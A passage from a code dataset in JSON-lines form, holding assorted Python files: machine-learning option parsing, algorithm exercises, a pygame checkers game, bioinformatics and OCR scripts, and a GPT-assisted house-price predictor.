args.doc)\n\n # parse configs file\n with open(os.path.join(\"configs\", args.config), \"r\") as f:\n config = yaml.safe_load(f)\n\n if not args.sample:\n if not args.restart:\n if os.path.exists(args.log_path):\n shutil.rmtree(args.log_path)\n shutil.rmtree(tb_path)\n os.makedirs(args.log_path)\n os.makedirs(tb_path)\n else:\n if not os.path.exists(args.log_path):\n os.makedirs(args.log_path)\n if not os.path.exists(tb_path):\n os.makedirs(tb_path)\n\n with open(os.path.join(args.log_path, \"configs.yml\"), \"w\") as f:\n yaml.dump(config, f, default_flow_style=False)\n\n args.tb_logger = tb.SummaryWriter(log_dir=tb_path)\n # setup logger\n level = getattr(logging, args.verbose.upper(), None)\n if not isinstance(level, int):\n raise ValueError(\"level {} not supported\".format(args.verbose))\n\n handler1 = logging.StreamHandler()\n handler2 = logging.FileHandler(os.path.join(args.log_path, \"stdout.txt\"))\n formatter = logging.Formatter(\n \"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\"\n )\n handler1.setFormatter(formatter)\n handler2.setFormatter(formatter)\n logger = logging.getLogger()\n logger.addHandler(handler1)\n logger.addHandler(handler2)\n logger.setLevel(level)\n\n else:\n level = getattr(logging, args.verbose.upper(), None)\n if not isinstance(level, int):\n raise ValueError(\"level {} not supported\".format(args.verbose))\n\n handler1 = logging.StreamHandler()\n formatter = logging.Formatter(\n \"%(levelname)s - %(filename)s - %(asctime)s - %(message)s\"\n )\n handler1.setFormatter(formatter)\n logger = logging.getLogger()\n logger.addHandler(handler1)\n logger.setLevel(level)\n\n if args.sample:\n os.makedirs(os.path.join(args.exp, \"image_samples\"), exist_ok=True)\n args.image_folder = os.path.join(\n args.exp, \"image_samples\", args.doc\n )\n if not os.path.exists(args.image_folder):\n 
os.makedirs(args.image_folder)\n\n return args, config\n","repo_name":"zzw-zwzhang/pytorch-ddpim","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"32385223429","text":"import sys\n\ninput = sys.stdin.readline\n\n# i번째 행 검사\ndef check_row(i):\n visited = [False] * n # 경사로를 놓은 곳\n for j in range(n - 1):\n d = matrix[i][j] - matrix[i][j + 1]\n if abs(d) > 1:\n return False\n\n # 오른쪽이 한칸 높음\n elif d == -1:\n if j + 1 - l < 0:\n return False\n for k in range(j + 1 - l, j + 1):\n if visited[k]:\n return False\n if matrix[i][k] != matrix[i][j]:\n return False\n visited[k] = True\n\n # 왼쪽이 한칸 높음\n elif d == 1:\n if j + l + 1 > n:\n return False\n for k in range(j + 1, j + l + 1):\n if visited[k]:\n return False\n if matrix[i][k] != matrix[i][j + 1]:\n return False\n visited[k] = True\n\n return True\n\n\nn, l = map(int, input().split())\nmatrix = [[*map(int, input().split())] for _ in range(n)]\n\ncnt = 0\nfor i in range(n):\n cnt += check_row(i)\n\n# 전치\nmatrix = list(zip(*matrix))\nfor i in range(n):\n cnt += check_row(i)\n\nprint(cnt)\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/BOJ/14890_경사로.py","file_name":"14890_경사로.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25790005239","text":"import pygame\nfrom.constant import WHITE, RED, BLACK, BLUE, GREEN, PLAYER2, PLAYER1, SQUARE_SIZE, Y, X, WIDTH, HEIGHT, KING2, KING1,\\\n CROWN, GREY\n\npygame.font.init()\n# base_font_cp = pygame.font.Font('freesansbold.ttf', 50)\nbase_font_cp = pygame.font.Font('freesansbold.ttf', 25)\n\n\ndef get_all_pieces(board, player):\n \"\"\"\n :param board:\n :param player:\n :return: positions of every pieces for the giving player on the board\n \"\"\"\n\n pieces = []\n if player == PLAYER1:\n king = KING1\n else:\n king = KING2\n for i in range(Y):\n for j in range(Y):\n if board[i][j] == player or board[i][j] == king:\n pieces.append([i, j])\n return pieces\n\n\ndef draw_turn(win, player):\n \"\"\"\n :param win: Window\n :param player: player\n :return: draw which player plays now beside the board\n \"\"\"\n radius = SQUARE_SIZE * 0.3\n radius1 = radius + SQUARE_SIZE * 0.05\n if player == PLAYER1:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE//2, HEIGHT//2], radius1)\n pygame.draw.circle(win, GREEN, [WIDTH + SQUARE_SIZE//2, HEIGHT//2], radius)\n else:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE//2, HEIGHT // 2], radius1)\n pygame.draw.circle(win, RED, [WIDTH + SQUARE_SIZE//2, HEIGHT // 2], radius)\n\n\ndef creating_piece(table):\n \"\"\"\n :param table: board\n :return: a matrix with the corresponding pieces to each player\n \"\"\"\n # attributing each player his pawn\n for x in range(0, Y//2 - 1):\n k = 0\n while k < X:\n if x % 2 != 0:\n table[x][k] = PLAYER1\n k += 2\n else:\n table[x][k+1] = PLAYER1\n k += 2\n for x in range(Y//2 + 1, Y):\n k = 0\n while k < X:\n if x % 2 != 0:\n table[x][k] = PLAYER2\n k += 2\n else:\n table[x][k+1] = PLAYER2\n k += 2\n return table\n\n\ndef draw_board(win):\n \"\"\"\n :param win: Window\n :return: draw the board on our window\n \"\"\"\n win.fill(BLACK)\n for i in range(Y):\n for j in range(X):\n if i % 2 == 0 != j % 2:\n pygame.draw.rect(win, WHITE, (i * SQUARE_SIZE, j * SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n elif i % 2 != 0 == j % 2:\n pygame.draw.rect(win, WHITE, (i * SQUARE_SIZE, j * 
SQUARE_SIZE, SQUARE_SIZE, SQUARE_SIZE))\n\n\ndef draw_piece(win, table):\n \"\"\"\n :param win: Window\n :param table: Board\n :return: draw the pieces on the board\n \"\"\"\n draw_board(win)\n radius = SQUARE_SIZE * 0.3\n radius1 = radius + SQUARE_SIZE * 0.05\n for i in range(Y):\n for j in range(X):\n if table[i][j] == PLAYER1 or table[i][j] == KING1:\n pygame.draw.circle(win, BLUE, [SQUARE_SIZE * j + SQUARE_SIZE // 2, SQUARE_SIZE * i + SQUARE_SIZE // 2],\n radius1)\n pygame.draw.circle(win, GREEN, [SQUARE_SIZE*j + SQUARE_SIZE // 2, SQUARE_SIZE*i + SQUARE_SIZE//2],\n radius)\n elif table[i][j] == PLAYER2 or table[i][j] == KING2:\n pygame.draw.circle(win, BLUE, [SQUARE_SIZE * j + SQUARE_SIZE // 2, SQUARE_SIZE * i + SQUARE_SIZE // 2],\n radius1)\n pygame.draw.circle(win, RED, [SQUARE_SIZE*j + SQUARE_SIZE // 2, SQUARE_SIZE*i + SQUARE_SIZE//2],\n radius)\n if table[i][j] == KING1 or table[i][j] == KING2:\n win.blit(CROWN, (SQUARE_SIZE * j + SQUARE_SIZE // 2 - CROWN.get_width()//2, SQUARE_SIZE*i +\n SQUARE_SIZE//2 - CROWN.get_height()//2))\n draw_captured_pieces(win, table)\n\n\ndef draw_possible_moves(win, possible):\n \"\"\"\n :param win: Window\n :param possible: possible moves of the chosen piece in an array\n :return: draw the moves in grey on the board\n \"\"\"\n radius = SQUARE_SIZE * 0.2\n for element in possible:\n pygame.draw.circle(win, GREY, [SQUARE_SIZE * element[1] + SQUARE_SIZE // 2, SQUARE_SIZE * element[0]\n + SQUARE_SIZE // 2], radius)\n\n\ndef draw_captured_pieces(win, table):\n \"\"\"\n :param win: Window\n :param table: game matrix\n :return: draw the captured pieces beside the game board\n \"\"\"\n radius = SQUARE_SIZE * 0.3\n radius1 = radius + SQUARE_SIZE * 0.05\n captured_pieces_p1 = captured_pieces_p2 = 0\n\n for i in range(Y):\n for j in range(Y):\n if table[i][j] == PLAYER1 or table[i][j] == KING1:\n captured_pieces_p1 += 1\n elif table[i][j] == PLAYER2 or table[i][j] == KING2:\n captured_pieces_p2 += 1\n\n captured_pieces_p1 = (((Y // 2) - 1) * (X // 2)) - captured_pieces_p1\n captured_pieces_p2 = (((Y // 2) - 1) * (X // 2)) - captured_pieces_p2\n\n cp2 = base_font_cp.render(str(captured_pieces_p1), True, RED)\n cp1 = base_font_cp.render(str(captured_pieces_p2), True, GREEN)\n\n win.blit(cp1, (WIDTH + SQUARE_SIZE // 2, SQUARE_SIZE // 2 - 15))\n # win.blit(cp1, (WIDTH + SQUARE_SIZE//2 - 25, SQUARE_SIZE//2 - 50))\n win.blit(cp2, (WIDTH + SQUARE_SIZE//2 - 25, HEIGHT - SQUARE_SIZE//2))\n\n counter1 = counter2 = 0\n for i in range(captured_pieces_p2 + captured_pieces_p1):\n if counter2 < captured_pieces_p2:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE // 2, SQUARE_SIZE + (i*10)], radius1)\n pygame.draw.circle(win, RED, [WIDTH + SQUARE_SIZE // 2, SQUARE_SIZE + (i*10)], radius)\n counter2 += 1\n if counter1 < captured_pieces_p1:\n pygame.draw.circle(win, BLUE, [WIDTH + SQUARE_SIZE // 2, HEIGHT - (SQUARE_SIZE + (i*10))], radius1)\n pygame.draw.circle(win, GREEN, [WIDTH + SQUARE_SIZE // 2, HEIGHT - (SQUARE_SIZE + (i*10))], radius)\n counter1 += 1\n\n\ndef mouse_position(pos):\n \"\"\"\n get the mouse position when clicked on and convert it to the corresponding position integers in our matrix\n :param: position of the mouse on the screen\n :return: matrix index\n \"\"\"\n x, y = pos\n m = x // SQUARE_SIZE\n n = y // SQUARE_SIZE\n return n, m\n","repo_name":"Yameni-code/Checkers","sub_path":"Dame/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} 
+{"seq_id":"32385675349","text":"import sys\n\nsys.setrecursionlimit(100000)\ninput = sys.stdin.readline\n\n\ndef dfs(x):\n global cnt\n cnt += 1\n d[x] = cnt\n parent = d[x]\n stack.append(x)\n\n for nxt in graph[x]:\n if d[nxt] == 0:\n parent = min(parent, dfs(nxt))\n elif not finished[nxt]:\n parent = min(parent, d[nxt])\n\n if parent == d[x]:\n scc = []\n while True:\n top = stack.pop()\n scc.append(top)\n finished[top] = True\n if top == x:\n break\n\n SCC.append(scc)\n\n return parent\n\n\ndef check():\n def has_in_edge(scc):\n for x in scc:\n for y in in_graph[x]:\n if y not in scc:\n return True\n return False\n\n if len(SCC) == 1:\n return True\n\n if has_in_edge(SCC[-1]):\n return False\n\n for i in range(len(SCC) - 2, -1, -1):\n if not has_in_edge(SCC[i]):\n return False\n\n return True\n\n\nt = int(input())\nfor tc in range(t):\n n, m = map(int, input().split())\n\n cnt = 0\n d = [0] * n\n finished = [False] * n\n\n in_graph = [[] for _ in range(n)]\n graph = [[] for _ in range(n)]\n for _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n in_graph[b].append(a)\n\n stack = []\n SCC = []\n\n for i in range(n):\n if d[i] == 0:\n dfs(i)\n\n if not check():\n print(\"Confused\")\n else:\n for i in sorted(SCC[-1]):\n print(i)\n\n if tc != t - 1:\n input()\n print()\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/BOJ/3977_축구전술.py","file_name":"3977_축구전술.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19925659847","text":"import numpy as np\n\ndef singhvals(c_struct, target_dist, true_param=None, n_samples = 1000):\n assert n_samples >= 2, 'n_samples must be greater than 2.'\n n_samples = int(n_samples)\n if true_param is None:\n true_param = [T[0] for T in target_dist(n_samples)]\n else:\n true_param = [true_param]*n_samples\n if isinstance(c_struct(true_param[0], target_dist(1)[0]), (list, tuple, np.ndarray)):\n singhvals = [list(s) for s in [*zip(*map(c_struct, true_param, target_dist(n_samples)))]]\n [s.sort() for s in singhvals]\n else:\n singhvals = [*map(c_struct, true_param, target_dist(n_samples))]\n singhvals.sort()\n return singhvals\n\n\ndef struct_to_consonant(c_struct, data):\n if isinstance(c_struct(domain[0], data), (list, tuple, np.ndarray)):\n return lambda x: 2 * c_struct(x, data)[1] if c_struct(x, data)[1] < 0.5 else 1 if c_struct(x, data)[0] < 0.5 else 2 * (1 - c_struct(x, data)[0])\n else:\n return lambda x: 2 * c_struct(x, data) if c_struct(x, data) < 0.5 else 2 * (1 - 2 * c_struct(x, data))\n","repo_name":"Institute-for-Risk-and-Uncertainty/Singh-Tools","sub_path":"singhtools/singhtools.py","file_name":"singhtools.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33725628917","text":"# Link : https://practice.geeksforgeeks.org/problems/n-meetings-in-one-room-1587115620/1\n\n# Input:\n# N = 6\n# start[] = {1,3,0,5,8,5}\n# end[] = {2,4,6,7,9,9}\n# Output: \n# 4\n\n# Meetings = [(1,2) , (3,4) , (0,6) , (5,7) , (8,9) , (5,9)]\n# Required Output - > Get the max number of meetings that can be scheduled from the timings given \n\n# Get the maximum number of short meetings from the list of meetings\n\n# Sorting The meetings wrt Start time -> [(0,6),(1,2),(3,4),(5,7),(5,9)]\n# O/p = (0,6) => 1 meeting can be scheduled ad the end time of the meeting is 6 and there is no meeting\n# starting after 6 , so Op is 1\n\n# Sorting the 
meetings wrt End Time , Start time-> [(1,2) , (3,4) , (0,6) , (5,7) , (5,9) , (8,9) ]\n\n# Op = [(1,2) , (3,4) , (5,7) , (8,9) ] => 4\n\n# Condition for selecting a meeting - > Start time of the meeting should be greater than\n# the end time of the previous meeting\n\n# Approach :\n\n# Variables :\n# i = Track the previous meetings -> i = 0\n# j = Track the current meetings -> j = 1\n# counter = Count of number of meetings that can be scheduled -> counter = 1\n# By default the first meeting will be scheduled , so counter initialized with value 1\n\n# 1. Make a list of Meetings with start time and end time \n# 2. Sort the list wrt start time and then sort it wrt to end time\n# 3. Iterate through the meetings and check the condition that whether the start time of the current \n# meeting is greater than the end time of the previous meeting \n\n# for j in range(1, n):\n# if(Meetings[j][0] > Meetings[i][1]):\n# counter ++\n# i = j\n\n# 4. Return counter\n\n\nimport sys\nimport io\n\nclass Solution:\n \n #Function to find the maximum number of meetings that can\n #be performed in a meeting room.\n def maximumMeetings(self,n,start,end):\n # code here\n Meetings = []\n for i in range(n):\n Meetings.append([start[i] , end[i]])\n \n Meetings.sort(key = lambda x : x[0])\n Meetings.sort(key = lambda x : x[1])\n # To track the previous meeting\n i = 0 \n # To track the current meeting\n j = 1\n # First meeting always gets selected\n counter = 1\n \n for j in range(1,n):\n # Condition for scheduling\n if(Meetings[j][0] > Meetings[i][1]):\n counter += 1\n i = j\n \n # print(Meetings)\n return counter\n \nif __name__ == '__main__':\n test_cases = int(input())\n for cases in range(test_cases):\n n = int(input())\n start_time = list(map(int , input().strip().split()))\n end_time = list(map(int , input().strip().split()))\n ob = Solution()\n print(ob.maximumMeetings(n,start_time , end_time))","repo_name":"smv1999/CompetitiveProgrammingQuestionBank","sub_path":"DSA 450 GFG/ActivitySelection.py","file_name":"ActivitySelection.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":1181,"dataset":"github-code","pt":"54"} +{"seq_id":"22528181055","text":"# -*- coding: utf-8 -*-\r\nfrom .basePage import basePage\r\nfrom . 
import elementConfig as point\r\nimport time\r\n\r\n\r\nclass FlightPage(basePage):\r\n def select_ways(self, way):\r\n self.log.info(\"选择航程类型\")\r\n way = int(way)\r\n elements = self.getElementlist(0, 1, **point.FLIGHTPAGE[\"type_container\"])\r\n elements[way-1].click()\r\n\r\n def go_citypage(self, city):\r\n self.log.info(\"选择%s地\" % city)\r\n self.find_element(*point.FLIGHTPAGE[city]).click()\r\n\r\n def search(self):\r\n self.log.info(\"搜索\")\r\n self.find_element(*point.FLIGHTPAGE[\"search\"]).click()\r\n\r\n def verify_page(self):\r\n return self.isElement_exist(*point.FLIGHTPAGE[\"search\"])\r\n\r\n def select_cabin(self, cabin):\r\n self.log.info(\"选择舱位\")\r\n self.find_element(*point.FLIGHTPAGE[\"cabin\"]).click()\r\n num = self._cabin_to_number(cabin)\r\n for i in range(0, num):\r\n self.swipedown_little(0.95, 0.90)\r\n time.sleep(1)\r\n self.find_element(*point.FLIGHTPAGE[\"confirm\"]).click()\r\n\r\n def _cabin_to_number(self,cabin):\r\n return {\r\n \"经济舱\": 0,\r\n \"高端经济舱\": 1,\r\n \"商务舱\": 2,\r\n \"头等舱\": 3\r\n }[cabin]","repo_name":"liushan22/python-appium","sub_path":"testSet/page/flightPage.py","file_name":"flightPage.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32404085778","text":"#!/usr/bin/env python\n# coding: utf-8\n\n#load notebook with code below uncommented if size of file is too large for memory:\n#jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000\n\nimport pandas as pd\nimport numpy as np\nimport json\nfrom pandas.io.json import json_normalize #package for flattening json in pandas df\nimport flatten_json\nimport objectpath\n\n#load json\nwith open(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/Sleep_ReBLAST.json\") as f:\n data = json.load(f)\n\n#put json into pandas df\nraw = json_normalize(data[\"BlastOutput2\"], sep=\"_\")\ndf = pd.DataFrame(raw)\n\n\n### loop through df to extract node and taxids for each ###\n\ndf_final = pd.DataFrame(columns=[\"nodename\", \"hit_number\", \"taxid\", \"description\"])\n\nfor x in range(len(df)):\n nodename = df[\"report_results_search_query_title\"].iloc[x]\n Hit = df[\"report_results_search_hits\"].iloc[x]\n print(\"Working on\", x)\n\n for hit_dict in Hit:\n hit_dict_descr = hit_dict[\"description\"]\n hit_dict_num = hit_dict[\"num\"]\n hit_dict_descr = hit_dict_descr[0]\n taxid = hit_dict_descr[\"taxid\"]\n diction = {\"nodename\":[nodename], \"hit_number\": [hit_dict_num], \"taxid\": [taxid], \"description\":[hit_dict_descr]}\n df_temp = pd.DataFrame.from_dict(diction)\n df_final = df_final.append(df_temp)\n\nprint(df_final.head())\n\n#get list of nodes with mus musculus taxid\ndf_final_mus = df_final.loc[df_final['taxid'] == 10090]\ndf_final_filter_unique = pd.DataFrame(df_final_mus.nodename.unique(), columns=[\"nodename\"])\n\n# download tab fasta to filter fasta\ndf_fasta = pd.read_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/Sleep_All_K75_blastedcontigs_cleaned_named_filteredTABAllFASTA.txt\", sep=\"\\t\")\n\n#rename column\ndf_fasta.rename(columns={\"node\": \"nodename\"}, inplace=True)\n\n#filter out nodes with mus musculus from tab fasta \ndf_fasta_cleaned = df_fasta[df_fasta[\"nodename\"].isin(df_final_filter_unique[\"nodename\"]) == False]\ndf_fasta_cleaned_r = df_fasta_cleaned[[\"nodename\", 
\"fasta\"]]\ndf_fasta_cleaned_r.to_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/SleepMice_musremoved_finalfasta.txt\", sep=\"\\t\", header=None, index=None)\n\n#### clean gtf file ####\n\n# download gtf to filter fasta\ndf_gtf = pd.read_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/Sleep_All_K75_blastedcontigs_cleaned_named_filtered_jgi.gtf\", sep=\"\\t\", header=None)\n\n\n# filter and write out gtf\ndf_gtf_cleaned = df_gtf[df_gtf[0].isin(df_final_filter_unique[\"nodename\"]) == False]\ndf_gtf_cleaned.to_csv(\"/Users/patrickgonzales/Desktop/Linklab/Microbiome/SleepMice/contigs/SleepMice_musremoved.gtf\", sep=\"\\t\", header=None, index=None)\n\n","repo_name":"PGonzo/Bioinformatics","sub_path":"BLAST_JSON_parser.py","file_name":"BLAST_JSON_parser.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28924723980","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profile_user', '0003_auto_20161203_2133'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='user_details',\n name='any_congential',\n field=models.NullBooleanField(default=False),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='user_details',\n name='surgery_accident',\n field=models.CharField(default=b'', max_length=25),\n preserve_default=True,\n ),\n ]\n","repo_name":"stuti-187/Disease_Prediction_Using_ANN","sub_path":"website/profile_user/migrations/0004_auto_20161203_2137.py","file_name":"0004_auto_20161203_2137.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"18577184438","text":"#import pytesseract\nfrom wand.image import Image\nimport os\nimport time\n\nos.chdir(\"/Users/zalazhar/projects/RR/\")\nfilename = \"pdfs/apr_1904.pdf\"\n\n\n\nfilenames = [\"pdfs/\" + x for x in os.listdir(\"pdfs\")]\n\nfor filename in [filenames[4]]: \n \n print(filename)\n # # Open the PDF file\n png_files = []\n with Image(filename= filename, resolution=600) as img:\n # Iterate over each page in the PDF file\n for i, page in enumerate(img.sequence):\n # Convert the page to a PNG image\n with Image(page) as png:\n png.format = 'png'\n png_filename = f'mozilla_page{i}.png'\n png.save(filename=png_filename)\n png_files.append(png_filename)\n \n print(i)\n\n\n directory = filename.replace(\".pdf\",\"\").replace(\"pdfs/\",\"\")\n\n \n if not os.path.exists(directory):\n os.mkdir( os.getcwd() + \"/\" + directory )\n print(os.getcwd() + \"/\" + directory)\n for png in png_files:\n # Apply OCR to the image and extract text\n png_to = png.replace(\".png\",\"\" )\n print(png)\n cmd = f'tesseract -l eng+ara {png} {png_to}'\n os.system(cmd)\n os.system(f\"rm -rf *.png \")\n os.system(f\"mv *.txt {directory}\")\n \n \n \n ","repo_name":"zalazhar/RR","sub_path":"Transform_Text.py","file_name":"Transform_Text.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"186052556","text":"import openai\nimport re\nimport random\nfrom IPython.display import clear_output\nimport re\nimport pandas as pd\nimport numpy as np\nfrom sklearn.impute import KNNImputer\nimport pickle\nfrom sklearn.preprocessing import MinMaxScaler\nimport 
requests\nimport json\nfrom catboost import CatBoostRegressor\nbase = pd.read_csv(\"base.csv\")\nA = base['price'].to_numpy()\nbase = base.drop(\"Unnamed: 0\", axis=1)\nB = base.drop('price', axis=1).to_numpy()\nscaler = MinMaxScaler()\nscaler2 = MinMaxScaler()\nX_normalized = scaler.fit(B)\nY_norm = scaler2.fit(A.reshape(-1, 1))\n\nmodel = CatBoostRegressor()\nmodel.load_model(\"catboost_reg_model.bin\")\n\n\ndef gptRequist(field):\n url = \"https://api.openai.com/v1/chat/completions\"\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": f\"OPENAI API KEY\" \n }\n request_data = {\n \"model\": \"gpt-3.5-turbo\",\n \"messages\": [{\"role\": \"user\", \"content\": field}],\n \"temperature\": 0.7\n }\n request_json = json.dumps(request_data)\n\n response = requests.post(url, headers=headers, data=request_json)\n response_data = response.json()\n generated_message = response_data[\"choices\"][0][\"message\"][\"content\"]\n\n return generated_message\n\ndef getInfo(prompt):\n #adjustprompt = \"Please provide the values in the following format:\\n\\nneed: value\\ninfo: [key: value]\\ninfo: [key, value]\\n\\nExample: need: 5, info: [name: John], info: [age: 25]. Here is the prompt --> \" + prompt\n adjustprompt = \"Lire attentivement cette demande (\" + prompt + \" et fournir les valeurs explicitement dans cette forme : Need : value : [key : value], info : [key, value]..., (Example : need : 5, info : [name : John], info : [age : 25]).\"\n text = gptRequist(adjustprompt)\n need_pattern = r'need:\\s*([^,\\n]+)'\n need_match = re.search(need_pattern, text)\n need_value = need_match.group(1).strip() if need_match else None\n\n info_pattern = r'\\[([^:]+):\\s*([^,\\]]+)\\]'\n matches = re.findall(info_pattern, text)\n key_value_pairs = []\n if need_value != None:\n key_value_pairs.append(('need', need_value))\n for match in matches:\n key = match[0].strip()\n value = match[1].strip()\n if key != 'need': # Exclude 'need' from key_value_pairs\n key_value_pairs.append((key, value))\n \n return key_value_pairs\n\n\nextract_integer = lambda s: int(''.join(filter(str.isdigit, s))) if any(char.isdigit() for char in s) else None\ntransform_yes_no = lambda s: 1 if s.lower() == \"yes\" or s.lower()==\"true\" else 0\n\ndef getFeat(listfeat):\n json_file_path = 'feat.json'\n\n # Read the JSON file\n with open(json_file_path, 'r') as json_file:\n json_data = json.load(json_file)\n if listfeat != None:\n list_of_feat = []\n for key, value in json_data.items():\n for feat in listfeat:\n if value in feat[0]:\n if key not in ['waterfront']:\n list_of_feat.append((key, extract_integer(feat[1])))\n else:\n list_of_feat.append((key, transform_yes_no(feat[1])))\n #list_of_feat.append(('need', dict(listfeat)['need']))\n list_of_feat.append(('need', 'price'))\n else:\n return None\n print(list_of_feat)\n return dict(list_of_feat)\n\ndef imputer(feat):\n df = pd.read_csv(\"data_1.csv\")\n data = df.drop('id', axis=1)\n data['date'] = data['date'].str[4:6]\n col = list(data.columns)\n if feat==None:\n return None\n else:\n user_data = [0 for i in range(len(col))]\n for i in range(len(col)):\n user_data[i] = feat[col[i]] if col[i] in feat else np.nan\n\n X_missing = np.array(user_data)\n X_missing = np.reshape(X_missing, (1, X_missing.shape[0]))\n data = np.concatenate((data, X_missing), axis=0)\n\n knn_imputer = KNNImputer(n_neighbors=5)\n X_imputed = knn_imputer.fit_transform(data)\n\n return X_imputed[-1]\n\ndef catigories(df, column):\n one_hot_encoded = pd.get_dummies(df[column].astype(int), 
prefix=column)\n\n new_column_names = ['{}'.format(col) for col, value in zip(one_hot_encoded.columns, one_hot_encoded.columns)]\n one_hot_encoded.columns = [f'{x.split(\"_\")[0]}_{int(float(x.split(\"_\")[1]) * 10)}' for x in new_column_names]\n df = df.join(one_hot_encoded)\n\n return df.drop(column, axis=1)\n\ndef pre_process(imput):\n base = pd.read_csv(\"data_1.csv\")\n columns = ['date', 'price', 'bedrooms', 'bathrooms', 'sqft_living', 'sqft_lot', 'floors', 'waterfront', 'view', 'condition', 'grade', 'sqft_above', 'sqft_basement', 'yr_built', 'yr_renovated', 'zipcode', 'lat', 'long', 'sqft_living15', 'sqft_lot15']\n data_array = np.array(imput).reshape(1, -1)\n df = pd.DataFrame(data_array, columns=columns)\n df['floors'] = df['floors'].astype(int)\n df['view'] = df['view'].astype(int)\n df['condition'] = df['condition'].astype(int)\n df = catigories(df, 'floors')\n df = catigories(df, 'view')\n df = catigories(df, 'condition')\n base_year = 1900\n df['yr_built_encoded'] = df['yr_built'] - base_year\n df = df.drop('yr_built', axis=1)\n df['yr_renovated_encoded'] = df['yr_renovated'] - base_year\n df.loc[df['yr_renovated_encoded'] == -1900, 'yr_renovated_encoded'] = 0\n df = df.drop('yr_renovated', axis=1)\n zipcode_counts = base['zipcode'].value_counts()\n df['zipcode_freq_encoded'] = df['zipcode'].map(zipcode_counts)\n df = df.drop('zipcode', axis=1)\n df = catigories(df, 'date')\n featurs = ['Unnamed: 0', 'price', 'bedrooms', 'bathrooms', 'sqft_living',\n 'sqft_lot', 'waterfront', 'grade', 'sqft_above', 'sqft_basement', 'lat',\n 'long', 'sqft_living15', 'sqft_lot15', 'floors_10', 'floors_15',\n 'floors_20', 'floors_25', 'floors_30', 'floors_35', 'view_0', 'view_10',\n 'view_20', 'view_30', 'view_40', 'condition_10', 'condition_20',\n 'condition_30', 'condition_40', 'condition_50', 'yr_built_encoded',\n 'yr_renovated_encoded', 'zipcode_freq_encoded', 'date_10', 'date_20',\n 'date_30', 'date_40', 'date_50', 'date_60', 'date_70', 'date_80',\n 'date_90', 'date_100', 'date_110', 'date_120']\n output = pd.DataFrame()\n for item in featurs:\n if item not in df.columns:\n df[item] = 0\n output[item] = df[item]\n output.replace(True, 1, inplace=True)\n output = output.drop(\"Unnamed: 0\", axis=1)\n output.to_csv(\"output.csv\")\n return output\n\ndef predict(prompt):\n output = pre_process(list(imputer(getFeat(getInfo(prompt)))))\n X = output.drop('price', axis=1).to_numpy()\n X_normalized = scaler.transform(X)\n y = model.predict(X_normalized)\n return str(list(scaler2.inverse_transform(y.reshape(-1, 1)).reshape((1,)))[0])\n\ndef feedback(prompt):\n price = predict(prompt)\n adjustprompt = \"write a short respense to this ask (\" + prompt + \") by giving this suggation price: \" + price\n return gptRequist(adjustprompt)\n\n\n\"\"\"\nprompt = \"i want the price of a house in month 1 that contain 3 bedrooms and 1 bathroom and surface of living room is 250 with 1 floors in this zipcode 98178 that has water front with pool and basement of 2455\"\n\n\nprint(feedback(prompt))\"\"\"\n\n\n\n\n","repo_name":"iseddik/ChatEstimate","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":7108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"17417390934","text":"from solver import Solver\nimport numpy as np\n\nS = Solver()\n \nsample = np.array([[5,3,0,0,7,0,0,0,0],\n [6,0,0,1,9,5,0,0,0],\n [0,9,8,0,0,0,0,6,0],\n [8,0,0,0,6,0,0,0,3],\n [4,0,0,8,0,3,0,0,1],\n [7,0,0,0,2,0,0,0,6],\n [0,6,0,0,0,0,2,8,0],\n 
